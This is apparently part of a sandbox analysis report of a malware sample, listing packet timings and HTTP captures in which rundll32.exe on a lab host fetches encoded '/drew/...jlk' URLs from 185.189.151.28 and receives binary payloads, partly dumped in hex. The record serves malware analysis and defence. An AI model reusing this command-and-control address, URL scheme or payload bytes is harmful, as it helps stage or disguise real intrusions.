                              May 4, 2022 16:28:13.171360016 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.171366930 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.171380997 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.171396017 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.171396017 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.171418905 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.171443939 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.172142029 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.172220945 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.172631979 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.172723055 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.172729969 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.172745943 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.172761917 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.172777891 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.172804117 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.173070908 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173096895 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173116922 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173139095 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173161030 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173182011 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173190117 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.173197985 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173218966 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173233986 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.173240900 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173263073 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173268080 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.173283100 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173295975 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.173305035 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173316956 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.173326969 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173340082 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.173341036 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.173376083 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.173542023 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.173990011 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.174012899 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.174036026 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.174057007 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.174066067 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.174077988 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.174088955 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.174099922 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.174113989 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.174122095 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.174141884 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.174148083 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.174156904 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.174179077 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.174216032 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.175625086 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.175646067 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.175666094 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.175683022 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.175694942 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.175719023 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.175741911 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.176719904 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176742077 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176757097 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176815033 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.176819086 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176841974 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176852942 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.176863909 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176872969 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.176886082 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176892996 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.176908970 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176914930 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.176932096 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176939964 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.176953077 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176954031 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.176975012 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.176981926 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.176990986 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177006960 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177033901 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177090883 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177113056 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177136898 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177141905 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177160978 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177172899 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177184105 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177198887 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177205086 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177225113 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177225113 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177244902 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177252054 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177267075 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177283049 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177294016 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177321911 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177839994 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177870035 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177897930 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177918911 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177927971 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177942038 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.177956104 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177983999 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.177983999 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.178009987 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.178014994 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.178030014 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.178040981 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.178059101 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.182807922 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.182841063 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.182867050 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.182887077 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.182914972 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.182934999 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.182938099 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.182966948 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.182985067 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.182993889 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.183020115 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.183022022 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.183036089 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.183049917 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.183064938 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.183077097 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.183094978 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.183095932 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.183120966 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.184218884 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.184259892 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.184288025 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.184314966 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.184318066 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.184340954 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.184343100 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.184370995 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.184379101 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.184391975 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.184412003 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185165882 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185206890 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185234070 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185246944 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185255051 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185271025 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185292006 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185461998 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185492039 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185511112 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185520887 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185543060 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185549974 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185570002 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185579062 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185590982 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185607910 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185631990 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185633898 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185653925 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.185662985 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.185682058 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.186146975 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.186199903 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.314977884 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.337702036 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.619457006 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.619592905 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:13.619607925 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:13.619687080 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:29:12.354187012 CEST4975880192.168.2.5185.189.151.28
                              • 185.189.151.28
                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.549758185.189.151.2880C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              May 4, 2022 16:28:12.405919075 CEST500OUTGET /drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93dARdUH_2FoHr_2FV/0rrTpy9pc/1HdKJKRhTt7WBB4IQK6y/YM407RHM4U2q_2BMJQz/BPrYtABTFqi6nvzwRvIVUe/ZccTd3lUnONRt/36Ya8mGx/TeFUFTZ_2BUkjcjLP_2BV5Q/RmDIE1kWYj/OUKtn8nbT_2FNqVm2/qgQV8CVfL5vg/g3ZAMbEOx9s/O0o9X0KU42gffO/GcaP_2Fr_/2BV4K.jlk HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: 185.189.151.28
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              May 4, 2022 16:28:12.702059031 CEST502INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Wed, 04 May 2022 14:28:12 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 186001
                              Connection: keep-alive
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="62728d7ca6803.bin"
                              Data Raw: 90 fe 16 00 dd 20 a6 90 00 22 81 96 31 0c 06 ee 2c a0 48 f2 36 47 2b a8 1f 78 fb 84 fe 80 bc 68 83 a3 b0 1b 36 53 4b 75 0f a7 82 72 a1 41 e1 ff 47 06 9d 2a 90 8e 26 f8 83 6e 4c 7a ba 23 11 cb 7a c4 b5 76 5c eb 93 5b 14 3c c9 98 a5 e3 8b c6 36 cc 13 99 54 83 1a 4c 7b 46 49 91 17 ea 3b bb 0c 41 7e bf 1b 94 ad a3 32 05 aa 3b b0 4f 0c cb fc da 60 91 e2 bd 0d 03 9d 3c bd a2 dd d7 3f 0f 94 dc e3 06 b6 33 92 7e 82 88 84 01 f1 a2 02 d5 be cd 05 f8 80 06 a7 6e 5b 13 39 e7 33 43 f9 ee 65 41 c1 09 48 5c 39 3b 96 45 42 2c d6 0e 26 1b 0d 07 a7 4a 31 10 18 b4 36 c2 cb 88 ce 0e 68 30 dd c9 12 ff 5a 51 b6 1f 27 30 1a 25 a6 fb 5f b1 43 86 48 4a be 41 1d 15 20 30 a1 22 5a 46 58 f9 15 cc 69 9f 79 f8 78 b2 f1 f4 64 27 68 96 aa c1 73 d4 a7 58 3d ff ca 94 06 f9 ff 3e aa d1 00 6e c4 9d 6b 43 ac 0c 73 10 7f 0a 46 6d a9 74 29 b7 65 25 b5 77 93 76 25 7a b8 d9 0d 9c 83 ab 02 b1 78 eb 7b 8d 01 61 4d 6f 2e 0a da b3 c7 26 36 df 2a 95 d4 bf df d3 28 b1 c4 44 91 f7 ed 03 59 40 3e 4e f4 f3 2c 45 08 6c ca 1e 96 ba cc 33 c6 d6 79 6e fe fc 1f 27 b2 8a 2c 3c 8b e3 b4 14 90 a6 c2 99 62 62 09 88 68 9b e5 5d 5a 1b 90 23 e3 3f 1e 37 65 79 84 54 e6 fa 2d 39 d0 ab 72 5f 30 51 17 b6 8d 50 6c f0 28 5a 7e 77 5d 4f e7 c7 d6 f5 10 1c e5 da 36 7b 84 8e 94 d4 b7 df fa ab aa 17 53 ac e3 5b b0 72 c2 c8 65 0a a1 68 34 7f bd db 5d 00 76 de 42 e5 35 53 61 1f b2 46 e4 5d b5 7e a8 1e 4b 28 b7 9d 61 42 3c ec 8f ef c7 31 1c 8f 4c 68 8c 93 db e0 4b 86 ff 36 5e 8b e5 b6 46 f3 43 2c c5 92 03 de c3 8a 33 76 52 de 17 e1 6a 06 82 43 9b 7d 58 a6 f9 59 d0 35 f8 22 ec 02 92 5f c2 94 98 f9 9c 96 72 7e 76 47 66 f2 a7 7b 29 58 64 8a b4 df fe fc 78 4c 1b 45 88 71 86 ab 44 26 65 5b 29 85 31 04 6f 88 9a 15 b6 69 e2 90 95 32 fe 62 fe a0 0f 8f 8d 27 8d d0 63 31 96 18 ad c3 68 6d 1c 70 e8 65 66 f8 3d 34 d6 fb 93 0e 68 95 ae 3f 77 85 3e f6 c2 fd bd a3 12 e3 f3 a6 45 7e 74 c5 8b 22 2b 46 9f b3 fb 84 39 cc c4 6e 5f 09 3e cf c2 0b 7a d8 1a a2 f7 8f d2 7c c9 c7 0a 86 fa 2f c2 c4 67 c1 14 c1 36 f4 7e ca 10 53 88 8f 87 0c 9a d8 40 02 b6 78 d9 3c 5d 0e 45 6d e7 1a 21 99 b0 29 1b e3 e0 c0 2b 02 47 bc 53 00 3c 8a 66 74 ca 12 c0 49 dc 75 43 18 6a 42 18 c7 9e 0b 55 fd 45 f0 5b 24 3a b5 3c 10 b5 a7 10 c7 28 d0 c7 35 3f 54 35 0e 43 41 1d bf f5 f3 9a f4 ff 81 26 48 fc 80 5f f1 f8 71 99 e4 0e 17 6a 1c 75 5d 64 95 f7 e1 88 a2 00 94 90 5f 6c d5 cd fc a5 72 b7 b6 e5 e8 5a 13 63 f5 4b b5 8e f2 82 41 64 7f ad 8e bd e9 6e 51 d0 ef ec 63 ab 78 09 ea e7 8c 71 e8 5b 12 a9 e1 0c 48 ed cb 06 da f3 7d ca 85 d7 45 2a 4b b1 c5 1c 9e 75 8e 33 0a 02 a8 57 71 0d b4 5c b3 46 dc 38 88 72 5b 66 00 55 4f 00 28 2c 61 67 7b 85 11 64 8c 84 de df 2f 2c 69 eb ba a7 86 a4 d1 ce df aa e3 93 48 d5 31 9a b5 8c e4 87 f9 e2 a0 e3 0c 04 b3 c4 40 f7 0f 35 de fc 0b d9 d3 2a 45 b4 91 93 26 51 19 8d f2 45 67 3b ed ed 42 e2 04 cd 3e 9c e7 c6 6f 15 1b aa 04 9e d3 e4 9f c4 7b 67 37 b7 40 48 05 e7 10 93 59 8a 81 f5 ca 77 22 e4 64 f5 a9 d5 0a 81 0e 53 8f c5 43 23 2d 3d 0f e4 a2 8a df c3 7b 13 3e 33 04 8c 56 2d 62 47 40 39 58 13 9c 69 1e b2 1f da 02 b7 59 0b d1 3e
                              Data Ascii: "1,H6G+xh6SKurAG*&nLz#zv\[<6TL{FI;A~2;O`<?3~n[93CeAH\9;EB,&J16h0ZQ'0%_CHJA 0"ZFXiyxd'hsX=>nkCsFmt)e%wv%zx{aMo.&6*(DY@>N,El3yn',<bbh]Z#?7eyT-9r_0QPl(Z~w]O6{S[reh4]vB5SaF]~K(aB<1LhK6^FC,3vRjC}XY5"_r~vGf{)XdxLEqD&e[)1oi2b'c1hmpef=4h?w>E~t"+F9n_>z|/g6~S@x<]Em!)+GS<ftIuCjBUE[$:<(5?T5CA&H_qju]d_lrZcKAdnQcxq[H}E*Ku3Wq\F8r[fUO(,ag{d/,iH1@5*E&QEg;B>o{g7@HYw"dSC#-={>3V-bG@9XiY>
                              May 4, 2022 16:28:12.702090979 CEST503INData Raw: 7c e5 07 28 e7 97 88 65 8c 42 65 12 be 3c 6e 38 dd ae 31 b0 00 6d 67 0c 0c 1b ef cc 43 84 5e 73 ad 05 a5 dd 1f bd d3 3a d0 a2 96 f6 61 1d 21 dc f0 ae ff ab fe de df b7 31 57 f7 18 f7 dd 5a e1 9d 99 3e cb a0 6b 6f 9c c6 53 97 06 dc 65 2d e0 e5 5a
                              Data Ascii: |(eBe<n81mgC^s:a!1WZ>koSe-Z0QW&'S*6RRM}ix# &am41^2Cha/Zf=(oUdv$PQd7n-45kWPw2tI:j`=|Q#No{
                              May 4, 2022 16:28:12.702121019 CEST504INData Raw: 81 01 21 13 1b 0e fa 23 7a 85 b2 5f a7 1a f1 b0 f3 10 cd 90 bb 13 4e cc 62 ab 26 e9 45 51 ea 2b 1c 30 5f 1d 40 3b f5 32 9c 85 e3 8c 2f 0b fb 03 03 12 18 20 c6 e9 54 d0 0f 9d c2 9a 7a 02 7d 4f bd 74 79 e9 d8 dc 36 04 92 80 fc 2b aa 0e 72 6b 54 61
                              Data Ascii: !#z_Nb&EQ+0_@;2/ Tz}Oty6+rkTa@*9If1=f6_"zKT(}X<[Zvero-b8(Zl=a*<qfC^[]g?[$X8CN ANy!6c9U8
                              May 4, 2022 16:28:12.702136993 CEST506INData Raw: 07 65 8e 45 2f ff a8 5f 21 88 ac fd 2f 32 fe 2b 28 01 00 29 3b d8 eb 1d 6b 8b 6a 47 f2 9b 12 cf 02 a7 1d 66 e8 ae b6 d4 c5 df c6 46 41 d9 95 a0 dc a2 67 35 3e 19 fc 5a f0 10 4c 2e e1 7e 0c 48 cf aa 36 fe 2e 2a 12 d9 1b 10 09 ed 5a b4 c7 82 3e 33
                              Data Ascii: eE/_!/2+();kjGfFAg5>ZL.~H6.*Z>3glGh0'ZO\6p`Da__3@{{WOXB0Mo{/>EADKER-j9-gQ75O{^Ng5:g"~'zj\[|
                              May 4, 2022 16:28:12.702167034 CEST507INData Raw: 1d 9b 5a 47 2d 4e 6f 98 87 ad a5 6a 1e c6 3c 05 be 48 cc ba 1d d3 5b f8 f8 68 df 7d a2 95 56 2b 44 cd c8 e4 e3 f7 13 04 20 18 62 b0 f0 c0 91 a9 fb 0a 42 a5 3c fe 9a 56 07 98 40 e1 9b fd 9d 93 bd 63 29 a9 24 44 c6 cb 9c 99 e6 18 86 f2 c0 4d a5 7c
                              Data Ascii: ZG-Noj<H[h}V+D bB<V@c)$DM|j\LD!"tcM%? \~jv_ac4g7u}K*cu[j,nQ%.>87H5-A/4]?ZK?%@#qMK^CZ)0w
                              May 4, 2022 16:28:12.702183008 CEST508INData Raw: 9b 32 44 85 0e 85 38 a8 96 86 b8 32 31 f8 fb 3f ce 22 69 e4 88 7f 5c bd 56 b9 0b 9a 8a 57 77 6e b3 18 8b 80 b7 43 c0 79 ea 9b 59 46 3a 4c a3 9c 4a 63 37 a4 f1 b8 e1 18 15 40 18 90 52 0c 7a 25 70 39 a0 65 ac 7b d9 19 95 b7 8c 3d 06 9d 2c 50 9a d1
                              Data Ascii: 2D821?"i\VWwnCyYF:LJc7@Rz%p9e{=,P>G6fDZ6{)gHvgq)#ch.za0b_T=a!#w/%q!5B|;poiMucE[}?#VLa9QK:&,*1v
                              May 4, 2022 16:28:12.702269077 CEST509INData Raw: 89 37 ef 5e 93 27 61 3b e9 d7 bd c9 f4 ce e8 59 f5 fd 64 51 6a 34 7d 33 aa 72 b7 f1 13 4d d4 e1 b0 ff 11 e8 25 84 f0 e7 04 e9 6a fe 55 85 7c 74 94 a0 57 7e 02 c5 4f f4 df 98 a2 c6 f8 10 63 c2 71 bf f4 af 1e 11 1d 77 86 74 8d 7b a5 49 df 1c 2d 27
                              Data Ascii: 7^'a;YdQj4}3rM%jU|tW~Ocqwt{I-'}l/TI-4_*hQXe&$x`;_#9SgDNqhN3$l
                              May 4, 2022 16:28:12.702478886 CEST510INData Raw: 88 50 d8 44 f9 d4 c5 f5 b1 f6 1a 90 ec d5 e7 7f eb fe f7 51 81 b8 b6 2f 71 54 61 3b 2c 6c ff d5 5f 43 c9 a5 e9 6c 29 60 41 fa 81 d6 0b c4 e1 3b 4f 05 51 03 69 fe 18 ce f9 35 fc d7 42 ad a1 fe d8 cf 1f 00 a9 0a 2f b6 2e be 9e a4 d5 8e 5a db 2a 91
                              Data Ascii: PDQ/qTa;,l_Cl)`A;OQi5B/.Z*klxhW&3Y|G8\1)/6J<fyLR50va"m!g4qD[;\gXtYyY5B!LK
                              May 4, 2022 16:28:12.702497005 CEST512INData Raw: e8 4a 0b 3e 64 a1 a4 64 7b 92 28 ee d1 b9 eb 1a 50 fa a2 f4 e4 26 b2 fa c4 65 e3 9c b2 75 ed 35 91 4b 00 6e 97 6f e9 9f c9 31 89 1d fa c4 bb 24 d5 0f c0 9d 4e 9c 0b 95 07 77 1e ba 06 f5 d8 45 af 3c 1b 46 44 f6 ba 2c ea 0e e6 20 67 bf 0c 3b a6 56
                              Data Ascii: J>dd{(P&eu5Kno1$NwE<FD, g;V+K_>?[&>012;Ye].fr0Km$9/@7Us=Ju&=hDs>g0J^*_k?!)y&u^1'37Nm3{%O?<W\iq
                              May 4, 2022 16:28:12.702523947 CEST513INData Raw: a6 99 8e 66 a4 ed 14 8a 56 de 76 54 16 9c 8c 6c b7 09 36 ac b9 8c 34 07 25 93 b3 77 cd be d2 ac 71 60 cb 63 e5 ae 4c b3 57 76 16 48 ba 0b b0 d3 c6 9c 3b 53 2e 75 0f 8c f2 d8 06 e1 ea d6 e3 10 58 4d 41 71 45 c8 41 73 11 73 8b 24 28 df 23 e1 af c5
                              Data Ascii: fVvTl64%wq`cLWvH;S.uXMAqEAss$(#:s\V~bq2swU)M@U/=k[$fn(Z5%a<CW63K0zkkQL*yRrxF}|)Y#v#qg(eMW/MkV
                              May 4, 2022 16:28:12.724806070 CEST515INData Raw: c8 07 22 36 95 02 0c 58 e3 79 59 76 89 c8 79 5a ab 13 0c d7 6a d3 82 82 49 3f 35 a0 e3 78 3a b9 9b a4 ee b3 81 5e 2a 58 4b 6e cf 63 59 96 95 f4 e1 31 45 3b 08 47 16 d6 4e 32 79 d7 67 09 2d 48 da 84 71 95 f9 b3 95 32 4a 8f 36 5c e0 9a 18 25 db 69
                              Data Ascii: "6XyYvyZjI?5x:^*XKncY1E;GN2yg-Hq2J6\%i6'.It\9hW.]YR*0NTt<^HA5n=y]3~wB;i981l5|Z._F47D,qv=w]I6V[
                              May 4, 2022 16:28:12.829577923 CEST699OUTGET /drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: 185.189.151.28
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              May 4, 2022 16:28:13.126252890 CEST700INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Wed, 04 May 2022 14:28:13 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 238738
                              Connection: keep-alive
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="62728d7d19b58.bin"
